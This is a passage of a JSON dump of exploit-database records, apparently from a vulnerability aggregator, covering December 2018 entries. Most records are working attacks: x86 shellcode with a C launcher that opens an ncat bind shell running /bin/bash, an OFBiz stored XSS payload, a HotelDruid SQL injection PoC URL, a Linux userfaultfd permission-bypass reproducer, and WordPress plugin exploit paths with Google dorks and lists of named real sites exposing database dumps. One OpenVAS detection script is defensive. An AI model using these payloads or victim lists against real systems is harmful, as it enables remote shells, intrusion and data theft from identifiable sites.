"2018-12-12T05:52:27", "references": [], "description": "Exploit for linux/x86 platform in category shellcode", "edition": 1, "reporter": "T3jv1l", "published": "2018-12-12T00:00:00", "title": "Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-12-12T00:00:00", "id": "1337DAY-ID-31771", "href": "https://0day.today/exploit/description/31771", "sourceData": "/* \r\n Linux/x86-execve(/usr/bin/ncat -lvp 1337 -e/bin/bash)+NULL-FREE Shellcode(95 bytes)\r\n Author : T3jv1l\r\n Contact: [email\u00a0protected]\r\n Twitter:https://twitter.com/T3jv1l\r\n Shellcode len : 119 bytes\r\n Compilation: gcc shellcode.c -o shellcode\r\n Compilation for x64 : gcc -m32 shellcode.c -o shellcode\r\n Tested On: Ubuntu 16.04.5 LTS \r\n Arch: x86\r\n Size: 95 bytes\r\n Thanks for helping NytroRST\r\n\r\n\r\n############################################################################\r\nglobal _start:\r\n_start:\r\njmp short todo\r\n\r\n\r\nshellcode:\r\n\r\nxor eax, eax ;Zero out eax\r\nxor ebx, ebx ;Zero out ebx \r\nxor ecx, ecx ;Zero out ecx\r\ncdq\t \t\t;Zero out edx using the sign bit from eax\r\nmov BYTE al, 0xa4 ;Setresuid syscall 164 (0xa4)\r\nint 0x80 ;Syscall execute\r\npop esi ;Esi contain the string in db\r\nxor eax, eax ;Zero out eax\r\nmov[esi+13], al ;Null terminate /usr/bin/ncat\r\nmov[esi+22], al ;Null terminate -lvp1337\r\nmov[esi+34], al ;Null terminate -e/bin/bash\r\nmov[esi+35], esi ;Store address of /usr/bin/ncat in AAAA\r\nlea ebx, [esi+14] ;Load address of -lvp1337\r\nmov[esi+39], ebx ;Store address of -lvp1337 in BBBB taken from ebx\r\nlea ebx, [esi+23] ;Load address of -e/bin/bash into ebx\r\nmov[esi+43], ebx ;Store address of -e/bin/bash in CCCC taken from ebx\r\nmov[esi+47], eax ;Zero out DDDD\r\nmov al, 11 ;11 is execve syscall number \r\nmov ebx, esi ;Store address of /usr/bin/ncat\r\nlea ecx, [esi+35] ;Load address of ptr to argv[] array\r\nlea edx, [esi+47] ;envp[] NULL\r\nint 0x80 ;Syscall execute\r\n\r\ntodo:\r\ncall shellcode\r\ndb '/usr/bin/ncat#-lvp1337#-e/bin/bash#AAAABBBBCCCCDDDD'\r\n; 012345678901234567890123456789012345678901234567890\r\n\r\n######################################################################################\r\n\r\nncat.o: file format elf32-i386\r\n\r\n\r\nDisassembly of section .text:\r\n\r\n00000000 <_start>:\r\n 0:\teb 35 \tjmp 37 <todo>\r\n\r\n00000002 <shellcode>:\r\n 2:\t31 c0 \txor %eax,%eax\r\n 4:\t31 db \txor %ebx,%ebx\r\n 6:\t31 c9 \txor %ecx,%ecx\r\n 8:\t99 \tcltd \r\n 9:\tb0 a4 \tmov $0xa4,%al\r\n b:\tcd 80 \tint $0x80\r\n d:\t5e \tpop %esi\r\n e:\t31 c0 \txor %eax,%eax\r\n 10:\t88 46 0d \tmov %al,0xd(%esi)\r\n 13:\t88 46 16 \tmov %al,0x16(%esi)\r\n 16:\t88 46 22 \tmov %al,0x22(%esi)\r\n 19:\t89 76 23 \tmov %esi,0x23(%esi)\r\n 1c:\t8d 5e 0e \tlea 0xe(%esi),%ebx\r\n 1f:\t89 5e 27 \tmov %ebx,0x27(%esi)\r\n 22:\t8d 5e 17 \tlea 0x17(%esi),%ebx\r\n 25:\t89 5e 2b \tmov %ebx,0x2b(%esi)\r\n 28:\t89 46 2f \tmov %eax,0x2f(%esi)\r\n 2b:\tb0 0b \tmov $0xb,%al\r\n 2d:\t89 f3 \tmov %esi,%ebx\r\n 2f:\t8d 4e 23 \tlea 0x23(%esi),%ecx\r\n 32:\t8d 56 2f \tlea 0x2f(%esi),%edx\r\n 35:\tcd 80 \tint $0x80\r\n\r\n00000037 <todo>:\r\n 37:\te8 c6 ff ff ff \tcall 2 <shellcode>\r\n 3c:\t2f \tdas \r\n 3d:\t75 73 \tjne b2 <todo+0x7b>\r\n 3f:\t72 2f \tjb 70 <todo+0x39>\r\n 41:\t62 69 6e \tbound %ebp,0x6e(%ecx)\r\n 44:\t2f \tdas \r\n 45:\t6e \toutsb %ds:(%esi),(%dx)\r\n 46:\t63 61 74 \tarpl %sp,0x74(%ecx)\r\n 49:\t23 2d 6c 76 70 31 \tand 0x3170766c,%ebp\r\n 4f:\t33 33 \txor (%ebx),%esi\r\n 51:\t37 \taaa \r\n 52:\t23 2d 65 2f 62 69 \tand 0x69622f65,%ebp\r\n 58:\t6e \toutsb %ds:(%esi),(%dx)\r\n 59:\t2f \tdas \r\n 5a:\t62 61 73 \tbound %esp,0x73(%ecx)\r\n 5d:\t68 23 41 41 41 \tpush $0x41414123\r\n 62:\t41 \tinc %ecx\r\n 63:\t42 \tinc %edx\r\n 64:\t42 \tinc %edx\r\n 65:\t42 \tinc %edx\r\n 66:\t42 \tinc %edx\r\n 67:\t43 \tinc %ebx\r\n 68:\t43 \tinc %ebx\r\n 69:\t43 \tinc %ebx\r\n 6a:\t43 \tinc %ebx\r\n 6b:\t44 \tinc %esp\r\n 6c:\t44 \tinc %esp\r\n 6d:\t44 \tinc %esp\r\n 6e:\t44 \tinc %esp\r\n###################################################################################\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <sys/mman.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n\r\nint (*shellcodetotest)();\r\n\r\nchar shellcode[] = \"\\xeb\\x35\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x99\\xb0\\xa4\\xcd\\x80\\x5e\\x31\\xc0\\x88\\x46\\x0d\\x88\\x46\\x16\\x88\\x46\\x22\\x89\\x76\\x23\\x8d\\x5e\\x0e\\x89\\x5e\\x27\\x8d\\x5e\\x17\\x89\\x5e\\x2b\\x89\\x46\\x2f\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x23\\x8d\\x56\\x2f\\xcd\\x80\\xe8\\xc6\\xff\\xff\\xff\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x6e\\x63\\x61\\x74\\x23\\x2d\\x6c\\x76\\x70\\x31\\x33\\x33\\x37\\x23\\x2d\\x65\\x2f\\x62\\x69\\x6e\\x2f\\x62\\x61\\x73\\x68\\x23\";\r\n \r\n\r\n\r\nint main(int argc, char **argv) {\r\n\tvoid *ptr = mmap(0, 150, PROT_EXEC | PROT_WRITE| PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);\r\n\tif(ptr == MAP_FAILED){\r\n\t\tperror(\"mmap\");\r\n\t\texit(-1);\r\nprintf(\"Shellcode Length: %d\\n\", strlen(shellcode));\r\n\t}\r\n\r\n\r\n\tmemcpy(ptr, shellcode, sizeof(shellcode));\r\n\tshellcodetotest = ptr;\r\n\tshellcodetotest();\r\n\treturn 0;\r\n\r\n\r\n}\n\n# 0day.today [2018-12-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31771"}], "packetstorm": [{"lastseen": "2018-12-12T10:40:36", "references": [], "description": "", "edition": 1, "reporter": "DKM", "published": "2018-12-12T00:00:00", "title": "Apache OFBiz 16.11.05 Cross Site Scripting", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-12-12T00:00:00", "id": "PACKETSTORM:150763", "href": "https://packetstormsecurity.com/files/150763/Apache-OFBiz-16.11.05-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: Apache OFBiz v16.11.05 - Stored Cross-Site Scripting Vulnerability \n# Google Dork: N/A \n# Date: 09 - December - 2018 \n# Exploit Author: DKM \n# Vendor Homepage: https://ofbiz.apache.org/ \n# Software Link: https://www.apache.org/dyn/closer.lua/ofbiz/apache-ofbiz-16.11.05.zip \n# Version: v16.11.05 \n# Tested on: Windows 10/Ubuntu/Kali Linux \n# CVE : N/A \n \n# Description: \nA Stored Cross Site Scripting vulnerability is found in the \"Text Data\" Field within the 'ViewForumMessage' section. \nThis is because the application does not properly sanitise the users input. \n \n \n# Steps to Reproduce: \n1. Login into the E-Commerce application as any user. \n2. Open or the URL will be(https://localhost:8443/ecommerce/control/AddForumThread?forumId=ASK) \n3. In \"Short Name\" give enything you want, Now scroll down and click on \"Source\" Button, Now in \"Text Data\" field give payload as: <script>alert(1)</script> and click on \"Add\" \n4. In the next page click on \"View\" respective to the newly added data and one can see that our XSS Payload gets executed. \n5. The same things happens to the message reply page on \"ViewForumMessage\" which further confirms the presence of stored XSS. \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150763/apacheofbiz161105-xss.txt"}, {"lastseen": "2018-12-12T10:40:36", "references": [], "description": "", "edition": 1, "reporter": "Sainadh Jamalpur", "published": "2018-12-12T00:00:00", "title": "HotelDruid 2.3 SQL Injection", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-12-12T00:00:00", "id": "PACKETSTORM:150764", "href": "https://packetstormsecurity.com/files/150764/HotelDruid-2.3-SQL-Injection.html", "sourceData": "`# Exploit Title: SQL Injection in HotelDruid version 2.3 \n# Google Dork: N/A \n# Date: 9-12-2018 \n# Exploit Author: Sainadh Jamalpur \n# Vendor Homepage: http://www.hoteldruid.com \n# Software Link: https://sourceforge.net/projects/hoteldruid/ \n# Version: 2.3 (REQUIRED) \n# Tested on: Windows x64/ Kali linux x64 \n# CVE : N/A \n \nDescription: \nHoteldruid is an open source program for hotel management (property \nmanagement software) developed by DigitalDruid.Net \nVulnerability Description: \nthe \"id_utente_mod\" parameter is Vulnerable to SQL Injection Vulnerability. \nPayload: \n1' AND EXTRACTVALUE(5,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT \n(ELT(5=5,1)))))-- - \n \nPoc: http://hoteldruid/gestione_utenti.php?anno=2018&id_sessione=&modifica_gruppi=SI&id_utente_mod=1%27%20AND%20EXTRACTVALUE(5,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT%20(ELT(5=5,1)))))--%20%20- \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150764/hoteldruid23-sql.txt"}, {"lastseen": "2018-12-12T10:40:36", "references": [], "description": "", "edition": 1, "reporter": "Jann Horn", "published": "2018-12-12T00:00:00", "title": "Linux userfaultfd tmpfs File Permission Bypass", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-18397"], "modified": "2018-12-12T00:00:00", "id": "PACKETSTORM:150748", "href": "https://packetstormsecurity.com/files/150748/Linux-userfaultfd-tmpfs-File-Permission-Bypass.html", "sourceData": "`Linux: userfaultfd bypasses tmpfs file permissions \n \nCVE-2018-18397 \n \n \nUsing the userfaultfd API, it is possible to first register a \nuserfaultfd region for any VMA that fulfills vma_can_userfault(): \nIt must be an anonymous VMA (->vm_ops==NULL), a hugetlb VMA \n(VM_HUGETLB), or a shmem VMA (->vm_ops==shmem_vm_ops). This means that \nit is, for example, possible to register userfaulfd regions for shared \nreadonly mappings of tmpfs files. \n \nAfterwards, the userfaultfd API can be used on such a region to \n(atomically) write data into holes in the file's mapping. This API \nalso works on readonly shared mappings. \n \nThis means that an attacker with read-only access to a tmpfs file that \ncontains holes can write data into holes in the file. \n \nReproducer: \n \nFirst, as root: \n===================== \nroot@debian:~# cd /dev/shm \nroot@debian:/dev/shm# umask 0022 \nroot@debian:/dev/shm# touch uffd_test \nroot@debian:/dev/shm# truncate --size=4096 uffd_test \nroot@debian:/dev/shm# ls -l uffd_test \n-rw-r--r-- 1 root root 4096 Oct 16 19:25 uffd_test \nroot@debian:/dev/shm# hexdump -C uffd_test \n00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n* \n00001000 \nroot@debian:/dev/shm# \n===================== \n \nThen, as a user (who has read access, but not write access, to that \nfile): \n===================== \nuser@debian:~/uffd$ cat uffd_demo.c \n#define _GNU_SOURCE \n#include <fcntl.h> \n#include <stdlib.h> \n#include <unistd.h> \n#include <sys/syscall.h> \n#include <linux/userfaultfd.h> \n#include <err.h> \n#include <sys/ioctl.h> \n#include <sys/mman.h> \n#include <stdio.h> \n \nstatic int uffd; \nstatic void *uf_mapping; \n \nint main(int argc, char **argv) { \nint rw_open_res = open(\"/dev/shm/uffd_test\", O_RDWR); \nif (rw_open_res == -1) \nperror(\"can't open for writing as expected\"); \nelse \nerrx(1, \"unexpected write open success\"); \n \nint mfd = open(\"/dev/shm/uffd_test\", O_RDONLY); \nif (mfd == -1) err(1, \"tmpfs open\"); \nuf_mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, mfd, 0); \nif (uf_mapping == (void*)-1) err(1, \"shmat\"); \n \n// Documentation for userfaultfd: \n// <a href=\"http://man7.org/linux/man-pages/man2/userfaultfd.2.html\" title=\"\" class=\"\" rel=\"nofollow\">http://man7.org/linux/man-pages/man2/userfaultfd.2.html</a> \n// <a href=\"http://man7.org/linux/man-pages/man2/ioctl_userfaultfd.2.html\" title=\"\" class=\"\" rel=\"nofollow\">http://man7.org/linux/man-pages/man2/ioctl_userfaultfd.2.html</a> \n// <a href=\"https://blog.lizzie.io/using-userfaultfd.html\" title=\"\" class=\"\" rel=\"nofollow\">https://blog.lizzie.io/using-userfaultfd.html</a> \nuffd = syscall(__NR_userfaultfd, 0); \nif (uffd == -1) err(1, \"userfaultfd\"); \nstruct uffdio_api api = { .api = 0xAA, .features = 0 }; \nif (ioctl(uffd, UFFDIO_API, &api)) err(1, \"API\"); \n \nstruct uffdio_register reg = { \n.range = { \n.start = (unsigned long)uf_mapping, \n.len = 0x1000 \n}, \n.mode = UFFDIO_REGISTER_MODE_MISSING \n}; \nif (ioctl(uffd, UFFDIO_REGISTER, ®)) err(1, \"REGISTER\"); \n \nchar buf[0x1000] = {'A', 'A', 'A', 'A'}; \nstruct uffdio_copy copy = { \n.dst = (unsigned long)uf_mapping, \n.src = (unsigned long)buf, \n.len = 0x1000, \n.mode = 0 \n}; \nif (ioctl(uffd, UFFDIO_COPY, ©)) err(1, \"copy\"); \nif (copy.copy != 0x1000) errx(1, \"copy len\"); \n \nprintf(\"x: 0x%08x\\n\", *(unsigned int*)uf_mapping); \nreturn 0; \n} \nuser@debian:~/uffd$ gcc -o uffd_demo uffd_demo.c -Wall \nuser@debian:~/uffd$ ./uffd_demo \ncan't open for writing as expected: Permission denied \nx: 0x41414141 \nuser@debian:~/uffd$ \n===================== \n \nAnd now again as root: \n===================== \nroot@debian:/dev/shm# hexdump -C uffd_test \n00000000 41 41 41 41 00 00 00 00 00 00 00 00 00 00 00 00 |AAAA............| \n00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n* \n00001000 \n===================== \n \n \nI asked MITRE for a CVE when I started writing the bug report, and \nthey've already given me CVE-2018-18397. \n \n \nBy the way, another interesting thing: Apparently userfaultfd even \nlets you write beyond the end of the file, and the writes become \nvisible if the file is subsequently truncated to a bigger size? \nThat seems wrong. \n \nAs root, create an empty file: \n===================== \nroot@debian:/dev/shm# rm uffd_test \nroot@debian:/dev/shm# touch uffd_test \nroot@debian:/dev/shm# ls -l uffd_test \n-rw-r--r-- 1 root root 0 Oct 16 19:44 uffd_test \nroot@debian:/dev/shm# \n===================== \n \nNow as a user, use userfaultfd to write into it: \n===================== \nuser@debian:~/uffd$ ./uffd_demo \ncan't open for writing as expected: Permission denied \nx: 0x41414141 \nuser@debian:~/uffd$ \n===================== \n \nAfterwards, to root, the file still looks empty, until it is truncated \nto a bigger size: \n===================== \nroot@debian:/dev/shm# ls -l uffd_test \n-rw-r--r-- 1 root root 0 Oct 16 19:44 uffd_test \nroot@debian:/dev/shm# hexdump -C uffd_test \nroot@debian:/dev/shm# truncate --size=4096 uffd_test \nroot@debian:/dev/shm# hexdump -C uffd_test \n00000000 41 41 41 41 00 00 00 00 00 00 00 00 00 00 00 00 |AAAA............| \n00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n* \n00001000 \nroot@debian:/dev/shm# \n===================== \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available (whichever is earlier), the bug \nreport will become visible to the public. \n \n \n \nFound by: jannh \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150748/GS20181212044456.txt"}, {"lastseen": "2018-12-11T10:31:04", "references": [], "description": "", "edition": 1, "reporter": "KingSkrupellos", "published": "2018-12-11T00:00:00", "title": "WordPress CodeCanyon-5293356-Ajax-Store-Locator-Wordpress 1.2.0 Disclosure", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-12-11T00:00:00", "id": "PACKETSTORM:150727", "href": "https://packetstormsecurity.com/files/150727/WordPress-CodeCanyon-5293356-Ajax-Store-Locator-Wordpress-1.2.0-Disclosure.html", "sourceData": "`################################################################################################# \n \n# Exploit Title : WordPress CodeCanyon-5293356-Ajax-Store-Locator-Wordpress \nPlugins 1.2.0 Multiple Vulnerabilities \n# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security \nArmy \n# Date : 10/12/2018 \n# Vendor Homepage : wordpress.org ~ \ncodecanyon.net/item/ajax-store-locator-v-20/4106209?s_rank=1 \n+ gizmocode.com ~ codecanyon.net/item/ajax-store-locator-wordpress/5293356 \n# Software Download Link : codecanyon.net/user/gizmocode/portfolio \n# Software Price : 16$ \n# More Information About Software : \n+ \nthemesinfo.com/wordpress-plugins/wordpress-codecanyon-5293356-ajax-store-locator-wordpress-plugin-dn4k \n# Tested On : Windows and Linux \n# Category : WebApps \n# Version Information : 1.2.0 and 2.0 \n# Exploit Risk : Medium \n# Google Dorks : \ninurl:''/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/'' \n+ inurl:''/wp-content/plugins/ajax-store-locator-wordpress/'' \nintext:''Powered By Gizmocode.com'' \nintext:''Powered by New Age Media Web'' \nintext:''2018 Agromaster Oy'' \nintext:''Copyright A(c) 2011-2014 Nationwide MRI. All Rights Reserved.'' \nintext:''A(c) 2015 by Palestra Digital'' \nintext:''Copyright A(c) 2018 TMUK GROUP LTD'' \nintext:''Copyright 2018 Omnicor, Inc. | All Rights Reserved'' \nintext:''Powered by WordPress | Theme Fusion'' \nintext:''Tous droits rA(c)servA(c)s A(c) 2018 Bfly.ca'' \nintext:''Managed by Kjenmarks - Wordpress specialisten'' \nintext:'' Site by Lucian Mitiu'' \nintext:''Avaz Inc. A(c) 2015 droits de reproduction rA(c)servA(c)s. Politique de \nconfidentialitA(c)'' \nintext:''realizacja: echomarketing.pl'' \nintext:''COPYRIGHT 2018 PROQUIP GOLF'' \nintext:''@2015 BAHAR AL-KUWAIT GROUP HOLDING COMPANY'' \n# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access \nControls ] \nCWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] \nCWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] \n \n################################################################################################# \n \n1) Vulnerabilities includes ; \n \na) Arbitrary File Download Vulnerability \n \nb) Database Backup Disclosure Vulnerability \n \n################################################################################################# \n \nMain Features of the Software => \n \nDirections to an searched location. \nStreet view. \nCustom Info label for providing additional information. \nSocial Sharing of searched locations (Facebook, Twitter and Pinterest). \nConfigurable Layouts. \nSearch and browse option. \nCategory filtration of store locations. \nManual plotting on map for addresses which Google doesnat understand. \nDrawer panel for more map access. \nGuided Installation wizard and much more features. \n \n################################################################################################# \n \n# Admin Panel Login Path : \n \n/wp-login.php \n \n# Arbitrary File Download Exploit => \n \n/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=[FAdegLENAMEHERE] \n \n/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_import/...... \n \n/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/xcel_export/...... \n \n/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/xcel_import_result/...... \n \n# Database Backup Disclosure Exploit : \n \n/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n/wp-content/plugins/ajax-store-locator-wordpress/db_dump.sql \n \n################################################################################################# \n \n# Example Vulnerable Sites => \n \n[+] \npilkemaster.fi/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n[+] \npilkemaster.fi/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=[FILENAME] \n \n[+] \ntmuk.org/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n[+] \nwikkistix.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n[+] \nkellogg-american.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n[+] \nrecargapr.com/web/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n[+] \nnationwidemri.com/wp-content/plugins/ajax-store-locator-wordpress/db_dump.sql \n \n[+] \nfloralelement.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n[+] \ntheblinkserver.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n[+] \nmasjewelz.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n[+] \nalbahargroup.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n[+] \nanokhi-collection.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n[+] \nproquipgolf.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n[+] \navazapp.fr/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n[+] \nbeninca.pl/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n[+] \nvintagetegels.nl/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql \n \n################################################################################################# \n \n# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team \n \n################################################################################################# \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150727/wpcc5293356120-xss.txt"}, {"lastseen": "2018-12-11T10:31:04", "references": [], "description": "", "edition": 1, "reporter": "KingSkrupellos", "published": "2018-12-11T00:00:00", "title": "WordPress JoeBooking 6.6.5 Database Disclosure", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-12-11T00:00:00", "id": "PACKETSTORM:150725", "href": "https://packetstormsecurity.com/files/150725/WordPress-JoeBooking-6.6.5-Database-Disclosure.html", "sourceData": "`################################################################################################# \n \n# Exploit Title : WordPress JoeBooking Plugins 6.6.5 Database Backup \nDisclosure \n# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security \nArmy \n# Date : 08/12/2018 \n# Vendor Homepage : joebooking.com ~wordpress.org/plugins/joebooking/ \n# Software Download Link : downloads.wordpress.org/plugin/joebooking.zip \n+ github.com/wp-plugins/joebooking \n+ github.com/wp-plugins/joebooking/blob/master/core6/model/db.sql \n# Tested On : Windows and Linux \n# Category : WebApps \n# Version Information : 6.6.5 \n# Exploit Risk : Medium \n# Google Dorks : inurl:''/wp-content/plugins/joebooking/'' \n# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access \nControls ] \nCWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] \nCWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] \n \n################################################################################################# \n \nJoeBooking a Appointment Scheduling For Providers and Salons - Description \n: \n \nJoeBooking is a WordPress appointment scheduling plugin that allows to \naccept service bookings online. \nIt is designed specifically for service professionals like massage \ntherapists, consultants, \ntutors, instructors, photographers, stylists, dog groomers and others \nwho need to schedule their time with clients online. \nJoeBooking appointment scheduling allows the owner to manage the plugin \nthrough a \npowerful admin panel and offers a self-service customer appointment \nbooking form embedded into a page or a post with a shortcode. \n \n################################################################################################# \n \n# Admin Panel Login Path : \n \n/wp-login.php \n \n# Exploit : \n \n/wp-content/plugins/joebooking/core6/model/db.sql \n \n################################################################################################# \n \n# Example Vulnerable Sites => \n \n[+] tcpersonalfitness.com/wp-content/plugins/joebooking/core6/model/db.sql \n \n[+] web.host-on-inter.net/wp-content/plugins/joebooking/core6/model/db.sql \n \n################################################################################################# \n \n# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team \n \n################################################################################################# \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150725/wpjooeboking665-disclose.txt"}], "openvas": [{"lastseen": "2018-12-12T13:36:31", "references": ["https://www.phpmyadmin.net/security/PMASA-2018-8/", "https://www.phpmyadmin.net/security/PMASA-2018-6/"], "pluginID": "1361412562310108513", "description": "phpMyAdmin is prone to multiple security vulnerabilities.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-12-12T00:00:00", "title": "phpMyAdmin 4.x < 4.8.4 Multiple Vulnerabilities - PMASA-2018-6, PMASA-2018-8 (Linux)", "type": "openvas", "enchantments": {}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-19970", "CVE-2018-19968"], "modified": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310108513", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108513", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_vuln_PMASA-2018-6_8_lin.nasl 12764 2018-12-12 07:44:24Z cfischer $\n#\n# phpMyAdmin 4.x < 4.8.4 Multiple Vulnerabilities - PMASA-2018-6, PMASA-2018-8 (Linux)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108513\");\n script_version(\"$Revision: 12764 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-12 08:44:24 +0100 (Wed, 12 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 07:54:53 +0100 (Wed, 12 Dec 2018)\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:N\");\n script_cve_id(\"CVE-2018-19968\", \"CVE-2018-19970\");\n script_name(\"phpMyAdmin 4.x < 4.8.4 Multiple Vulnerabilities - PMASA-2018-6, PMASA-2018-8 (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2018-6/\");\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2018-8/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to multiple security vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"- A flaw has been found where an attacker can exploit phpMyAdmin to\n leak the contents of a local file. The attacker must have access to the phpMyAdmin Configuration Storage\n tables, although these can easily be created in any database to which the attacker has access. An attacker\n must have valid credentials to log in to phpMyAdmin. This vulnerability does not allow an attacker to\n circumvent the login system (CVE-2018-19968).\n\n - A Cross-Site Scripting vulnerability was found in the navigation tree, where an attacker can deliver a\n payload to a user through a specially-crafted database/table name (CVE-2018-19970).\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin versions from at least 4.0 through 4.8.3.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.8.4 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) )\n exit( 0 );\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif( version_in_range( version:vers, test_version:\"4.0\", test_version2:\"4.8.3\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.8.4\", install_path:path );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 